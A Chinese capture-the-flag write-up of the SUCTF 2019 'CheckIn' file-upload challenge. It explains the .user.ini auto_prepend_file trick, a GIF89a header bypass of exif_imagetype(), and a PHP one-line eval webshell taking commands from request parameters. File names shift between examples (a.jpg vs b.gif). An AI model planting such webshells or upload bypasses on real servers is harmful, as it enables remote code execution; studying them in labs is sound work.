[SUCTF 2019]CheckIn(文件上传)

简介: [SUCTF 2019]CheckIn(文件上传)

前提知识

php.ini、.user.ini、.htaccess

php.ini是php的一个全局配置文件,对整个web服务起作用;而.user.ini和.htaccess一样是目录的配置文件。这里我们可以把.user.ini看作是用户自定义的一个php.ini,并且可以利用这个文件来构造后门和隐藏后门。

.user.ini比.htaccess用的更广,不管是nginx/apache/IIS,只要是以CGI/FastCGI模式运行的php都可以用这个方法。

1. 举个例子理解.user.ini作用:
2. /*这是.user.ini的两个配置  
3. auto_prepend_file是在文件前插入
4. auto_append_file是在文件最后才插入*/
5. 
6. 1.在user.ini 中设置
7. auto_prepend_file=b.gif
8. 
9. 2.在b.gif中设置 一句话木马
10. 
11. 3.还有个php文件 如:前面做题中的index.php    
12. 
13. 如果这三个条件在同一个目录下面,这里就相当于 在index.php中写了include "b.gif" , 可以进行文件包含,导致的后果是:当我们对目录中的index.php进行访问的时候,会调用.usre.ini 中的文件把b.gif文件以php的形式进行读取

局限

在.user.ini中使用这条配置也说了是在同目录下的其他.php文件中包含配置中所指定的文件,也就是说需要该目录下存在.php 文件,通常在文件上传中,一般是专门有一个目录用来存在图片,可能小概率会存在.php文件。 但是有时可以使用 ../ 来将文件上传到其他目录,达到一个利用的效果。

解题步骤

上传一句话后门,回显<? in contents :

更改为

<script language="php">eval($_REQUEST['cmd']);</script>

绕过exif_imagetype() 函数

exif_imagetype()函数会读取图像的第一个字节,并检查其签名,如果发现了恰当的签名则会返回相应的常量,否则返回false ,我们可以在一句话木马前面加上一个GIF图片文件头前缀GIF89a进行绕过

1. GIF89a
2. <script language='php'>eval($_REQUEST['cmd']);</script>

.htaccess 文件

1. <FilesMatch>
2. SetHandler application/x-httpd-php
3. </FilesMatch>

.htaccess 文件可以把后缀为其他类型的图片解析成php文件,使我们上传的图片内容可以被解析,但是这里对 .htaccess文件也做了限制,所以我们就需要想其他的办法。

构造一个.user.ini文件

1. GIF89a                  
2. auto_prepend_file=a.jpg

然后构造一个a.jpg

1.  GIF89a
2. <script language='php'> @eval($_POST['cmd']);</script>

然后将两个文件分别上传到服务器上

文件夹下面有三个文件,一个是 .user.ini, 一个是 a.jpg ,还有一个 index.php

1. //上传.user.ini文件,条件如下:
2. 
3. (1)服务器脚本语言为PHP
4. (2)对应目录下面有可执行的php文件              //index.php
5. (3)服务器使用CGI/FastCGI模式   
6. 
7. 
8. 上传的文件内容
9. GIF89a                         //auto_prepend_file是在文件前插入,而auto_append_file是在文件最后才插入。                  
10. auto_prepend_file=b.gif       //需要注意上穿的文件名字要和设定的名字一样,这里可以设定多个


目录
相关文章
BUUCTF FLAG 1
BUUCTF FLAG 1
1830 0
|
网络安全 数据安全/隐私保护 Python
[网络安全/CTF]护网杯 2018 easy_tornado 解题详析(Tornado之SSTI注入)
[网络安全/CTF]护网杯 2018 easy_tornado 解题详析(Tornado之SSTI注入)
510 0
|
JSON 开发框架 网络安全
[网络安全] Dirsearch 工具的安装、使用详细教程
[网络安全] Dirsearch 工具的安装、使用详细教程
12425 3
|
SQL Python
[CISCN2019 华北赛区 Day2 Web1]Hack World 1 题目分析与详解
[CISCN2019 华北赛区 Day2 Web1]Hack World 1 题目分析与详解
1897 0
[CISCN2019 华北赛区 Day2 Web1]Hack World 1 题目分析与详解
|
Web App开发 Go PHP
BUUCTF---[极客大挑战 2019]Http1
BUUCTF---[极客大挑战 2019]Http1
|
Shell PHP
BUUCTF---[MRCTF2020]你传你呢1
BUUCTF---[MRCTF2020]你传你呢1
|
数据库 数据安全/隐私保护
BUUCTF---[极客大挑战 2019]BabySQL1
BUUCTF---[极客大挑战 2019]BabySQL1
BUUCTF---web---[GXYCTF2019]BabyUpload
BUUCTF---web---[GXYCTF2019]BabyUpload
|
数据库 数据安全/隐私保护
BUUCTF---web---[极客大挑战 2019]HardSQL
BUUCTF---web---[极客大挑战 2019]HardSQL

热门文章

最新文章